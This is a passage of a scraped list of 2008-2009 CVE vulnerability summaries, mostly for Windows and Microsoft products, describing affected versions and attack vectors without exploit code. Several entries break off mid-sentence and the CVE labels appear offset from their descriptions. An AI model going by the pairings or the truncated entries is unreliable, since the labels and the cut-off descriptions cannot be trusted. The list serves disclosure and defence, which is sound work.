corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0222] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to a "pointer overwrite" and memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0223, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0221] Integer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a PowerPoint file containing a crafted record type for "collaboration information for different slides" that contains a field that specifies a large number of records, which triggers an under-allocated buffer and a heap-based buffer overflow, aka "Integer Overflow Vulnerability." [CVE-2009-0220] Multiple stack-based buffer overflows in the PowerPoint 4.0 importer (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via crafted formatting data for paragraphs in a file that uses a PowerPoint 4.0 native file format, related to (1) an incorrect calculation from a record header, or (2) an interget that is used to specify the number of bytes to copy, aka "Legacy File Format Vulnerability." [CVE-2009-0208] Unspecified vulnerability in HP Virtual Rooms Client before 7.0.1, when running on Windows, allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2009-0199] Heap-based buffer overflow in the VMnc media codec in vmnc.dll in VMware Movie Decoder before 6.5.3 build 185404, VMware Workstation 6.5.x before 6.5.3 build 185404, VMware Player 2.5.x before 2.5.3 build 185404, and VMware ACE 2.5.x before 2.5.3 build 185404 on Windows might allow remote attackers to execute arbitrary code via a video file with crafted dimensions (aka framebuffer parameters). [CVE-2009-0162] Cross-site scripting (XSS) vulnerability in Safari before 3.2.3, and 4 Public Beta, on Apple Mac OS X 10.5 before 10.5.7 and Windows allows remote attackers to inject arbitrary web script or HTML via a crafted feed: URL. [CVE-2009-0137] Multiple unspecified vulnerabilities in Safari RSS in Apple Mac OS X 10.4.11 and 10.5.6, and Windows XP and Vista, allow remote attackers to execute arbitrary JavaScript in the local security zone via a crafted feed: URL, related to "input validation issues." [CVE-2009-0133] Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564. [CVE-2009-0123] Unspecified vulnerability in Apple Safari on Mac OS X 10.5 and Windows allows remote attackers to read arbitrary files on a client machine via vectors related to the association of Safari with the (1) feed, (2) feeds, and (3) feedsearch URL types for RSS feeds. NOTE: as of 20090114, the only disclosure is a vague pre-advisory. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2009-0102] Microsoft Project 2000 SR1 and 2002 SP1, and Office Project 2003 SP3, does not properly handle memory allocation for Project files, which allows remote attackers to execute arbitrary code via a malformed file, aka "Project Memory Validation Vulnerability." [CVE-2009-0100] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0099] The Electronic Messaging System Microsoft Data Base (EMSMDB32) provider in Microsoft Exchange 2000 Server SP3 and Exchange Server 2003 SP2, as used in Exchange System Attendant, allows remote attackers to cause a denial of service (application outage) via a malformed MAPI command, aka "Literal Processing Vulnerability." [CVE-2009-0098] Microsoft Exchange 2000 Server SP3, Exchange Server 2003 SP2, and Exchange Server 2007 SP1 do not properly interpret Transport Neutral Encapsulation (TNEF) properties, which allows remote attackers to execute arbitrary code via a crafted TNEF message, aka "Memory Corruption Vulnerability." [CVE-2009-0097] Microsoft Office Visio 2002 SP2 and 2003 SP3 does not properly validate memory allocation for Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Corruption Vulnerability." [CVE-2009-0096] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly perform memory copy operations for object data, which allows remote attackers to execute arbitrary code via a crafted Visio document, aka "Memory Corruption Vulnerability." [CVE-2009-0095] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly validate object data in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Validation Vulnerability." [CVE-2009-0091] Microsoft .NET Framework 2.0, 2.0 SP1, and 3.5 does not properly enforce a certain type-equality constraint in .NET verifiable code, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Type Verification Vulnerability." [CVE-2009-0090] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, and 2.0 SP1 does not properly validate .NET verifiable code, which allows remote attackers to obtain unintended access to stack memory, and execute arbitrary code, via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Pointer Verification Vulnerability." [CVE-2009-0088] The WordPerfect 6.x Converter (WPFT632.CNV, 1998.1.27.0) in Microsoft Office Word 2000 SP3 and Microsoft Office Converter Pack does not properly validate the length of an unspecified string, which allows remote attackers to execute arbitrary code via a crafted WordPerfect 6.x file, related to an unspecified counter and control structures on the stack, aka "Word 2000 WordPerfect 6.x Converter Stack Corruption Vulnerability." [CVE-2009-0084] Use-after-free vulnerability in DirectShow in Microsoft DirectX 8.1 and 9.0 allows remote attackers to execute arbitrary code via an MJPEG file or video stream with a malformed Huffman table, which triggers an exception that frees heap memory that is later accessed, aka "MJPEG Decompression Vulnerability." [CVE-2009-0080] The ThreadPool class in Windows Vista Gold and SP1, and Server 2008, does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by leveraging incorrect thread ACLs to access the resources of one of the processes, aka "Windows Thread Pool ACL Weakness Vulnerability." [CVE-2009-0077] The firewall engine in Microsoft Forefront Threat Management Gateway, Medium Business Edition (TMG MBE) [CVE-2009-0076] Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote attackers to execute arbitrary code via the zoom style directive in conjunction with unspecified other directives in a malformed Cascading Style Sheets (CSS) stylesheet in a crafted HTML document, aka "CSS Memory Corruption Vulnerability." [CVE-2009-0075] Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0072] Microsoft Internet Explorer 6.0 through 8.0 beta2 allows remote attackers to cause a denial of service (application crash) via an onload=screen[""] attribute value in a BODY element. [CVE-2009-0016] Apple iTunes before 8.1 on Windows allows remote attackers to cause a denial of service (infinite loop) via a Digital Audio Access Protocol (DAAP) message with a crafted Content-Length header. [CVE-2009-0008] Unspecified vulnerability in Apple QuickTime MPEG-2 Playback Component before 7.60.92.0 on Windows allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted MPEG-2 movie. [CVE-2008-7295] Microsoft Internet Explorer cannot properly restrict modifications to cookies established in HTTPS sessions, which allows man-in-the-middle attackers to overwrite or delete arbitrary cookies via a Set-Cookie header in an HTTP response, related to lack of the HTTP Strict Transport Security (HSTS) includeSubDomains feature, aka a "cookie forcing" issue. [CVE-2008-7292] Bugzilla 2.20.x before 2.20.5, 2.22.x before 2.22.3, and 3.0.x before 3.0.3 on Windows does not delete the temporary files associated with uploaded attachments, which allows local users to obtain sensitive information by reading these files, a different vulnerability than CVE-2011-2977. [CVE-2008-7217] Microsoft Office 2008 for Mac, when running on Macintosh systems that restrict Office access to administrators, does not enforce this restriction for user ID 502, which allows local users with that ID to bypass intended security policy and access Office programs, related to permissions and ownership for certain directories. [CVE-2008-7211] CreativeLabs es1371mp.sys 5.1.3612.0 WDM audio driver, as used in Ensoniq PCI 1371 sound cards and when running on Windows Vista, does not create a Functional Device Object (FDO) to prevent user-moade access to the Physical Device Object (PDO), which allows local users to gain SYSTEM privileges via a crafted IRP request that dereferences a NULL FsContext pointer. [CVE-2008-7194] Unspecified vulnerability in Fujitsu Interstage HTTP Server, as used in Interstage Application Server 5.0, 7.0, 7.0.1, and 8.0.0 for Windows, allows attackers to cause a denial of service via a crafted request. [CVE-2008-7106] The installation of Sophos PureMessage for Microsoft Exchange 3.0 before 3.0.2, when both anti-virus and anti-spam are supported, does not create or launch the associated scan engines when the system is under heavy load, which has unspecified impact, probably remote bypass of scanner protection or a denial of service (message loss or delay). [CVE-2008-7105] Sophos PureMessage for Microsoft Exchange 3.0 before 3.0.2 allows remote attackers to cause a denial of service (EdgeTransport.exe termination) via a TNEF-encoded message with a crafted rich text body that is not properly handled during conversion to plain text. NOTE: this might be related to CVE-2008-7104. [CVE-2008-7104] Sophos PureMessage Scanner service (PMScanner.exe) in PureMessage for Microsoft Exchange 3.0 before 3.0.2 allows remote attackers to cause a denial of service (message queue delay and incomplete spam rule update) via a crafted (1) RTF or (2) PDF file. [CVE-2008-7064] Directory traversal vulnerability in the get_lang function in global.php in Quicksilver Forums 1.4.2 and earlier, as used in QSF Portal before 1.4.5, when running on Windows, allows remote attackers to include and execute arbitrary local files via a "\" (backslash) in the lang parameter to index.php, which bypasses a protection mechanism that only checks for "/" (forward slash), as demonstrated by uploading and including PHP code in an avatar file. [CVE-2008-7037] The Sidebar gadget in ITN News Gadget (aka ITN Hub Gadget) 1.06 for Windows Vista, and possibly other versions before 1.23, allows remote web servers or man-in-the-middle attackers to execute arbitrary commands via script in a short_title response. [CVE-2008-6938] Pi3Web 2.0.3 before PL2, when installed on Windows as a desktop application and without using the Pi3Web/Conf/Intenet.pi3, allows remote attackers to cause a denial of service (crash or hang) and obtain the full pathname of the server via a request to a file in the ISAPI directory that is not an executable DLL, which triggers the crash when the DLL load fails, as demonstrated using Isapi\users.txt. [CVE-2008-6903] Sophos Anti-Virus for Windows before 7.6.3, Anti-Virus for Windows NT/9x before 4.7.18, Anti-Virus for OS X before 4.9.18, Anti-Virus for Linux before 6.4.5, Anti-Virus for UNIX before 7.0.5, Anti-Virus for Unix and Netware before 4.37.0, Sophos EM Library, and Sophos small business solutions, when CAB archive scanning is enabled, allows remote attackers to cause a denial of service (segmentation fault) via a "fuzzed" CAB archive file, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats. [CVE-2008-6820] The db2fmp process in IBM DB2 8 before FP17, 9.1 before FP5, and 9.5 before FP2 on Windows runs with "OS privilege," which has unknown impact and attack vectors, a different vulnerability than CVE-2008-3856. [CVE-2008-6561] Citrix Presentation Server Client for Windows before 10.200 does not clear "credential information" from process memory in unspecified circumstances, which might allow local users to gain privileges. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6063] Microsoft Word 2007, when the "Save as PDF" add-on is enabled, places an absolute pathname in the Subject field during an "Email as PDF" operation, which allows remote attackers to obtain sensitive information such as the sender's account name and a Temporary Internet Files subdirectory name. [CVE-2008-5912] An unspecified function in the JavaScript implementation in Microsoft Internet Explorer creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5821] Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document. [CVE-2008-5787] Directory traversal vulnerability in mod.php in Arab Portal 2.1 on Windows allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, in conjunction with a show action. [CVE-2008-5749] DISPUTED Argument injection vulnerability in Google Chrome 1.0.154.36 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. NOTE: a third party disputes this issue, stating that Chrome "will ask for user permission" and "cannot launch the applet even [if] you have given out the permission." [CVE-2008-5717] Cross-site scripting (XSS) vulnerability in Hitachi JP1/Integrated Management - Service Support 08-10 through 08-10-05, 08-11 through 08-11-03, and 08-50 through 08-50-03 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5715] Mozilla Firefox 3.0.5 on Windows Vista allows remote attackers to cause a denial of service (application crash) via JavaScript code with a long string value for the hash property (aka location.hash). NOTE: it was later reported that earlier versions are also affected, and that the impact is CPU consumption and application hang in unspecified circumstances perhaps involving other platforms. [CVE-2008-5556] DISPUTED ** The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not recognize attack patterns designed to operate against web pages that are encoded with utf-7, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting crafted utf-7 content. NOTE: the vendor reportedly disputes this issue, stating "Behaviour is by design." [CVE-2008-5555] Microsoft Internet Explorer 8.0 Beta 2 relies on the XDomainRequestAllowed HTTP header to authorize data exchange between domains, which allows remote attackers to bypass the product's XSS Filter protection mechanism, and conduct XSS and cross-domain attacks, by injecting this header after a CRLF sequence, related to "XDomainRequest Allowed Injection (XAI)." NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5554] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not properly handle some HTTP headers that appear after a CRLF sequence in a URI, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS or redirection attacks, as demonstrated by the (1) Location and (2) Set-Cookie HTTP headers. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5553] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 disables itself upon encountering a certain X-XSS-Protection HTTP header, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting this header after a CRLF sequence. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5552] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks via a CRLF sequence in conjunction with a crafted Content-Type header, as demonstrated by a header with a utf-7 charset value. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5551] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting data at two different positions within an HTML document, related to STYLE elements and the CSS expression property, aka a "double injection." [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet) [CVE-2008-5439] Unspecified vulnerability in the SQLPlus Windows GUI component in Oracle Database 10.2.0.4 allows remote authenticated users to affect confidentiality via unknown vectors. [CVE-2008-5428] Opera 9.51 on Windows XP does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many "Content-type: message/rfc822 [CVE-2008-5424] The MimeOleClearDirtyTree function in InetComm.dll in Microsoft Outlook Express 6.00.2900.5512 does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many "Content-type: message/rfc822 [CVE-2008-5423] Sun Sun Ray Server Software 3.x and 4.0 and Sun Ray Windows Connector 1.1 and 2.0 expose the LDAP password during a configuration step, which allows local users to discover the Sun Ray administration password, and obtain admin access to the Data Store and Administration GUI, via unspecified vectors related to the utconfig component of the Server Software and the uttscadm component of the Windows Connector. [CVE-2008-5416] Heap-based buffer overflow in Microsoft SQL Server 2000 SP4, 8.00.2050, 8.00.2039, and earlier [CVE-2008-5415] The LDBserver service in the server in CA ARCserve Backup 11.1 through 12.0 on Windows allows remote attackers to execute arbitrary code via a handle_t argument to an RPC endpoint in which the argument refers to an incompatible procedure. [CVE-2008-5412] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows has unknown impact and attack vectors related to JSPs. NOTE: this is probably a duplicate of CVE-2009-0438. [CVE-2008-5408] Buffer overflow in the data management protocol in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allows remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via unknown vectors. NOTE: this can be exploited by unauthenticated remote attackers by leveraging CVE-2008-5407. [CVE-2008-5407] Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors. [CVE-2008-5326] The ClearQuest Maintenance Tool in IBM Rational ClearQuest 7.0.0 before 7.0.0.4 and 7.0.1 before 7.0.1.3 on Windows allows local users to obtain (1) user and (2) database passwords by using a password revealer utility on a field containing a series of asterisks. [CVE-2008-5315] Directory traversal vulnerability in the web interface in Apple iPhone Configuration Web Utility 1.0 on Windows allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2008-5181] Microsoft Communicator allows remote attackers to cause a denial of service (application or device outage) via instant messages containing large numbers of emoticons. [CVE-2008-5180] Microsoft Communicator, and Communicator in Microsoft Office 2010 beta, allows remote attackers to cause a denial of service (memory consumption) via a large number of SIP INVITE requests, which trigger the creation of many sessions. [CVE-2008-5178] Heap-based buffer overflow in Opera 9.62 on Windows allows remote attackers to execute arbitrary code via a long file:// URI. NOTE: this might overlap CVE-2008-5680. [CVE-2008-5100] The strong name (SN) implementation in Microsoft .NET Framework 2.0.50727 relies on the digital signature Public Key Token embedded in the pathname of a DLL file instead of the digital signature of this file itself, which makes it easier for attackers to bypass Global Assembly Cache (GAC) and Code Access Security (CAS) protection mechanisms, aka MSRC ticket MSRC8566gs. [CVE-2008-5038] Use-after-free vulnerability in the NetWare Core Protocol (NCP) feature in Novell eDirectory 8.7.3 SP10 before 8.7.3 SP10 FTF1 and 8.8 SP2 for Windows allows remote attackers to cause a denial of service and possibly execute arbitrary code via a sequence of "Get NCP Extension Information By Name" requests that cause one thread to operate on memory after it has been freed in another thread, which triggers memory corruption, aka Novell Bug 373852. [CVE-2008-5026] Microsoft SharePoint uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading HTML documents. [CVE-2008-4946] convirt 0.8.2 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/set_output temporary file, related to the (1) _template_/provision.sh, (2) Linux_CD_Install/provision.sh, (3) Fedora_PV_Install/provision.sh, (4) CentOS_PV_Install/provision.sh, (5) common/provision.sh, (6) example/provision.sh, and (7) Windows_CD_Install/provision.sh scripts in image_store/. [CVE-2008-4922] Buffer overflow in the DjVu ActiveX Control 3.0 for Microsoft Office (DjVu_ActiveX_MSOffice.dll) allows remote attackers to execute arbitrary code via a long (1) ImageURL property, and possibly the (2) Mode, (3) Page, or (4) Zoom properties. [CVE-2008-4844] Use-after-free vulnerability in the CRecordInstance::TransferToDestination function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via DSO bindings involving (1) an XML Island, (2) XML DSOs, or (3) Tabular Data Control (TDC) in a crafted HTML or XML document, as demonstrated by nested SPAN or MARQUEE elements, and exploited in the wild in December 2008. [CVE-2008-4837] Stack-based buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4820] Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player 9.0.124.0 and earlier on Windows allows attackers to obtain sensitive information via unknown vectors. [CVE-2008-4816] Unspecified vulnerability in the Download Manager in Adobe Reader 8.1.2 and earlier on Windows allows remote attackers to change Internet Security options on a client machine via unknown vectors. [CVE-2008-4800] The DebugDiag ActiveX control in CrashHangExt.dll, possibly 1.0, in Microsoft Debug Diagnostic Tool allows remote attackers to cause a denial of service (NULL pointer dereference and Internet Explorer 6.0 crash) via a large negative integer argument to the GetEntryPointForThread method. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4788] Microsoft Internet Explorer 6 omits high-bit URL-encoded characters when displaying the address bar, which allows remote attackers to spoof the address bar via a URL with a domain name that differs from an important domain name only in these characters, as demonstrated by using exam%A9ple.com to spoof example.com, aka MSRC ticket MSRC7900. [CVE-2008-4787] Visual truncation vulnerability in Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar via a URL with a hostname containing many &nbsp [CVE-2008-4582] Mozilla Firefox 3.0.1 through 3.0.3, Firefox 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13, when running on Windows, do not properly identify the context of Windows .url shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy and obtain sensitive information via an HTML document that is directly accessible through a filesystem, as demonstrated by documents in (1) local folders, (2) Windows share folders, and (3) RAR archives, and as demonstrated by IFRAMEs referencing shortcuts that point to (a) about:cache?device=memory and (b) about:cache?device=disk, a variant of CVE-2008-2810. [CVE-2008-4562] Buffer overflow in the ovlaunch CGI program in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 on Windows allows remote attackers to execute arbitrary code via a crafted Host parameter. NOTE: this issue may be partially covered by CVE-2009-0205. [CVE-2008-4544] Unspecified vulnerability in an unspecified Microsoft API, as used by Cisco Unity and possibly other products, allows remote attackers to cause a denial of service by sending crafted packets to dynamic UDP ports, related to a "processing error." [CVE-2008-4540] Windows Mobile 6 on the HTC Hermes device makes WLAN passwords available to an auto-completion mechanism for the password input field, which allows physically proximate attackers to bypass password authentication and obtain WLAN access. [CVE-2008-4493] Microsoft PicturePusher ActiveX control (PipPPush.DLL 7.00.0709), as used in Microsoft Digital Image 2006 Starter Edition, allows remote attackers to force the upload of arbitrary files by using the AddString and Post methods and a modified PostURL to construct an HTTP POST request. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4473] Multiple heap-based buffer overflows in Adobe Flash CS3 Professional on Windows and Flash MX 2004 allow remote attackers to execute arbitrary code via an SWF file containing long control parameters. [CVE-2008-4450] Cross-site scripting (XSS) vulnerability in adodb.php in XAMPP for Windows 1.6.8 allows remote attackers to inject arbitrary web script or HTML via the (1) dbserver, (2) host, (3) user, (4) password, (5) database, and (6) table parameters. NOTE: the provenance of this information is unknown [CVE-2008-4411] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.15.210 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-1663. [CVE-2008-4381] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (application crash) via Javascript that calls the alert function with a URL-encoded string of a large number of invalid characters. [CVE-2008-4324] The user interface event dispatcher in Mozilla Firefox 3.0.3 on Windows XP SP2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a series of keypress, click, onkeydown, onkeyup, onmousedown, and onmouseup events. NOTE: it was later reported that Firefox 3.0.2 on Mac OS X 10.5 is also affected. [CVE-2008-4301] * DISPUTED ** A certain ActiveX control in iisext.dll in Microsoft Internet Information Services (IIS) allows remote attackers to set a password via a string argument to the SetPassword method. NOTE: this issue could not be reproduced by a reliable third party. In addition, the original researcher is unreliable. Therefore the original disclosure is probably erroneous. [CVE-2008-4300] A certain ActiveX control in adsiis.dll in Microsoft Internet Information Services (IIS) allows remote attackers to cause a denial of service (browser crash) via a long string in the second argument to the GetObject method. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-4299] A certain ActiveX control in the Microsoft Internet Authentication Service (IAS) Helper COM Component in iashlpr.dll allows remote attackers to cause a denial of service (browser crash) via a large integer value in the first argument to the PutProperty method. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-4293] Unspecified vulnerability in Opera before 9.52 on Windows, when registered as a protocol handler, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors in which Opera is launched by other applications. [CVE-2008-4278] VMware VirtualCenter 2.5 before Update 3 build 119838 on Windows displays a user's password in cleartext when the password contains unspecified special characters, which allows physically proximate attackers to steal the password. [CVE-2008-4266] Array index vulnerability in Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP3 [CVE-2008-4265] Microsoft Office Excel 2000 SP3 allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet that contains a malformed object, which triggers memory corruption during the loading of records from this spreadsheet, aka "File Format Parsing Vulnerability." [CVE-2008-4264] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4260] Microsoft Internet Explorer 7 sometimes attempts to access a deleted object, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-4259] Microsoft Internet Explorer 7 sometimes attempts to access uninitialized memory locations, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, related to a WebDAV request for a file with a long name, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-4258] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 does not properly validate parameters during calls to navigation methods, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Parameter Validation Memory Corruption Vulnerability." [CVE-2008-4256] The Charts ActiveX control in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "Charts Control Memory Corruption Vulnerability." [CVE-2008-4254] Multiple integer overflows in the Hierarchical FlexGrid ActiveX control (mshflxgd.ocx) in Microsoft Visual Basic 6.0 and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allow remote attackers to execute arbitrary code via crafted (1) Rows and (2) Cols properties to the (a) ExpandAll and (b) CollapseAll methods, related to access of incorrectly initialized objects and corruption of the "system state," aka "Hierarchical FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4253] The FlexGrid ActiveX control in Microsoft Visual Basic 6.0, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, Office FrontPage 2002 SP3, and Office Project 2003 SP3 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4252] The DataGrid ActiveX control in Microsoft Visual Basic 6.0 and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "DataGrid Control Memory Corruption Vulnerability." [CVE-2008-4211] Integer signedness error in (1) QuickLook in Apple Mac OS X 10.5.5 and (2) Office Viewer in Apple iPhone OS 1.0 through 2.1 and iPhone OS for iPod touch 1.1 through 2.1 allows remote attackers to cause a denial of service (application termination) and execute arbitrary code via a crafted Microsoft Excel file that triggers an out-of-bounds memory access, related to "handling of columns." [CVE-2008-4197] Opera before 9.52 on Windows, Linux, FreeBSD, and Solaris, when processing custom shortcut and menu commands, can produce argument strings that contain uninitialized memory, which might allow user-assisted remote attackers to execute arbitrary code or conduct other attacks via vectors related to activation of a shortcut. [CVE-2008-4163] Unspecified vulnerability in ISC BIND 9.3.5-P2-W1, 9.4.2-P2-W1, and 9.5.0-P2-W1 on Windows allows remote attackers to cause a denial of service (UDP client handler termination) via unknown vectors. [CVE-2008-4110] Buffer overflow in the SQLVDIRLib.SQLVDirControl ActiveX control in Tools\Binn\sqlvdir.dll in Microsoft SQL Server 2000 (aka SQL Server 8.0) allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long URL in the second argument to the Connect method. NOTE: this issue is not a vulnerability in many environments, since the control is not marked as safe for scripting and would not execute with default Internet Explorer settings. [CVE-2008-4033] Cross-domain vulnerability in Microsoft XML Core Services 3.0 through 6.0, as used in Microsoft Expression Web, Office, Internet Explorer, and other products, allows remote attackers to obtain sensitive information from another domain and corrupt the session state via HTTP request header fields, as demonstrated by the Transfer-Encoding field, aka "MSXML Header Request Vulnerability." [CVE-2008-4032] Microsoft Office SharePoint Server 2007 Gold and SP1 and Microsoft Search Server 2008 do not properly perform authentication and authorization for administrative functions, which allows remote attackers to cause a denial of service (server load), obtain sensitive information, and "create scripts that would run in the context of the site" via requests to administrative URIs, aka "Access Control Vulnerability." [CVE-2008-4031] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4030] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4029] Cross-domain vulnerability in Microsoft XML Core Services 3.0 and 4.0, as used in Internet Explorer, allows remote attackers to obtain sensitive information from another domain via a crafted XML document, related to improper error checks for external DTDs, aka "MSXML DTD Cross-Domain Scripting Vulnerability." [CVE-2008-4028] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4027] Double free vulnerability in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4026] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4025] Integer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4024] 